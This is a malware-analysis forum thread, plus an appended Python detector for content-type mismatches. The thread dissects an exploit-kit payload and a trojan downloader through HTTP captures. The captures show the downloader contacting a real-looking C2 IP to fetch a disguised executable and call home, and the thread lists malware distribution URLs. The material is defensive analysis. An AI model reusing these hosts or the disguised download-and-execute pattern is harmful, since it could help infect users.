A forum for reverse engineering, OS internals and malware analysis 

 #16654  by Xylitol
 Fri Nov 16, 2012 5:33 pm
Payload of Serenity Exploit Kit
Code:
hxxp://winampgroup.co.uk/k0ff/index.php?s=ag
https://www.virustotal.com/file/95e1139 ... /analysis/
4/44 and 22/44 on unpacked.
Attachments
infected
 #18850  by EP_X0FF
 Fri Apr 05, 2013 2:19 pm
Win32:Virut wrote:
Also Dorifel?

_hxxp://khwrte.best.lt.ua/dlimage4.php

https://www.virustotal.com/en/file/fa3d ... /analysis/

This is a trojan downloader. First it downloads the following picture:

http://i.imgur.com/UIJ71m6.jpg
Code:
GET /pics/post/funny-pictures-auto-couple-sex-469407.jpeg HTTP/1.0
Host: img7.joyreactor.com

HTTP/1.1 200 OK
Server: nginx/1.2.4
Date: Fri, 05 Apr 2013 14:06:57 GMT
Content-Type: image/jpeg
Content-Length: 84064
Connection: close
X-Powered-By: PHP/5.3.14
Cache-Control: max-age=0
Last-Modified: Sat, 23 Mar 2013 11:33:06 GMT
Expires: Fri, 05 Apr 2013 14:06:57 GMT

......JFIF
Next it calls ShellExecute to display this picture. Meanwhile, in the background, it downloads the real payload.
Code:
POST /daol/oadl.php HTTP/1.0
Host: 94.242.250.178
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

u=man02&p=irs4Kpw0aA&l=4

HTTP/1.1 200 OK
Date: Fri, 05 Apr 2013 14:10:54 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Pragma: public
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="YouWhoreJPEG.exe";
Content-Transfer-Encoding: binary
Content-Length: 110592
Connection: close
Content-Type: application/force-download

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
Uploads it to the %UserProfile% folder under a random name and executes it. Afterwards it drops a self-deletion bat to the %TEMP% folder.

This payload is Backdoor:Win32/Tofsee.F, see http://www.microsoft.com/security/porta ... 2fTofsee.F

Call home
Code:
GET /daol/uiash4.dat?wv=51&bt=32 HTTP/1.0
Host: 94.242.250.178

HTTP/1.1 200 OK
Date: Fri, 05 Apr 2013 14:08:13 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Wed, 13 Mar 2013 11:46:20 GMT
ETag: "7e003-72-4d7ccf45edb00"
Accept-Ranges: bytes
Content-Length: 114
Connection: close
Content-Type: video/unknown

.6.
Original + unpacked in attach. Posts moved.
Attachments
pass: infected
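The three captures above share a pattern that is easy to check mechanically: the payload arrives as a PE under a vague Content-Type with an attachment name dressed up as a picture, and the call-home reply is declared as video/unknown while carrying a few bytes of non-media data. As an added example (not code from the thread or from either poster), here is a small checker a proxy or sandbox could run over such captures. The sample captures are constructed from the headers quoted in the post, with truncated bodies.

```python
"""Check captured HTTP responses for a body that contradicts the headers.

Added example, not code from the thread: the kind of rule a proxy or sandbox
can apply to captures like the ones quoted above. The sample captures are
constructed from the headers in the post, with truncated bodies.
"""
import re

# Leading bytes of a few file types worth recognising
MAGIC = {
    b"MZ": "pe-executable",
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG": "png",
    b"GIF8": "gif",
}
MEDIA_KINDS = {"jpeg", "png", "gif"}

# Content-Types under which a PE body would be unremarkable
EXECUTABLE_TYPES = {"application/x-msdownload", "application/x-dosexec",
                    "application/octet-stream"}
EXECUTABLE_SUFFIXES = (".exe", ".scr", ".dll", ".bat", ".cmd", ".pif", ".com")
DECOY_TOKENS = re.compile(r"jpe?g|png|gif|pdf|docx?|xlsx?", re.I)


def parse_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status line, headers, body).

    Header names are lower-cased; repeated headers (the payload response has
    two Cache-Control lines) are joined with a comma.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        key = name.strip().lower()
        value = value.strip()
        headers[key] = f"{headers[key]}, {value}" if key in headers else value
    return lines[0], headers, body


def sniff(body: bytes) -> str:
    """Identify the body by its leading bytes, not by what the server says."""
    for magic, kind in MAGIC.items():
        if body.startswith(magic):
            return kind
    return "unknown"


def analyze(raw: bytes) -> list:
    """Return human-readable findings for one captured response."""
    _, headers, body = parse_response(raw)
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    kind = sniff(body)
    findings = []

    # 1. An executable arriving under a non-executable (or vague) type
    if kind == "pe-executable" and ctype not in EXECUTABLE_TYPES:
        findings.append(f"PE body served as {ctype or 'no content-type'}")

    # 2. A media type declared, but the bytes are not any known media format
    if ctype.startswith(("image/", "video/")) and kind not in MEDIA_KINDS:
        findings.append(f"declared {ctype} but body is {kind} ({len(body)} bytes)")

    # 3. Attachment filename that is executable, possibly dressed as a picture
    m = re.search(r'filename="?([^";]+)"?', headers.get("content-disposition", ""), re.I)
    if m:
        name = m.group(1)
        stem, dot, suffix = name.rpartition(".")
        if dot and ("." + suffix).lower() in EXECUTABLE_SUFFIXES:
            findings.append(f"attachment with executable name {name}")
            if DECOY_TOKENS.search(stem):
                findings.append(f"executable name mimics a document/image: {name}")
    return findings


# Constructed captures, built from the headers quoted in the thread (bodies truncated)
DECOY_IMAGE = (b"HTTP/1.1 200 OK\r\nServer: nginx/1.2.4\r\nContent-Type: image/jpeg\r\n"
               b"Content-Length: 84064\r\nConnection: close\r\n\r\n"
               b"\xff\xd8\xff\xe0\x00\x10JFIF\x00...")
PAYLOAD = (b"HTTP/1.1 200 OK\r\nServer: Apache/2.2.15 (CentOS)\r\n"
           b"Cache-Control: must-revalidate, post-check=0, pre-check=0\r\n"
           b"Cache-Control: private\r\n"
           b'Content-Disposition: attachment; filename="YouWhoreJPEG.exe";\r\n'
           b"Content-Transfer-Encoding: binary\r\nContent-Length: 110592\r\n"
           b"Content-Type: application/force-download\r\n\r\n"
           b"MZ\x90\x00\x03\x00\x00\x00...This program cannot be run in DOS mode.")
CALL_HOME = (b"HTTP/1.1 200 OK\r\nServer: Apache/2.2.15 (CentOS)\r\n"
             b"Content-Length: 114\r\nContent-Type: video/unknown\r\n\r\n.6.")

if __name__ == "__main__":
    for label, cap in (("decoy image", DECOY_IMAGE), ("payload", PAYLOAD),
                       ("call home", CALL_HOME)):
        print(label, "->", analyze(cap) or ["clean"])
```

The decoy JPEG comes back clean, the payload response trips all three rules, and the call-home reply is flagged for its mismatched media type. Sniffing the body rather than trusting Content-Type is the point: the server controls the headers, but not what a PE file has to start with.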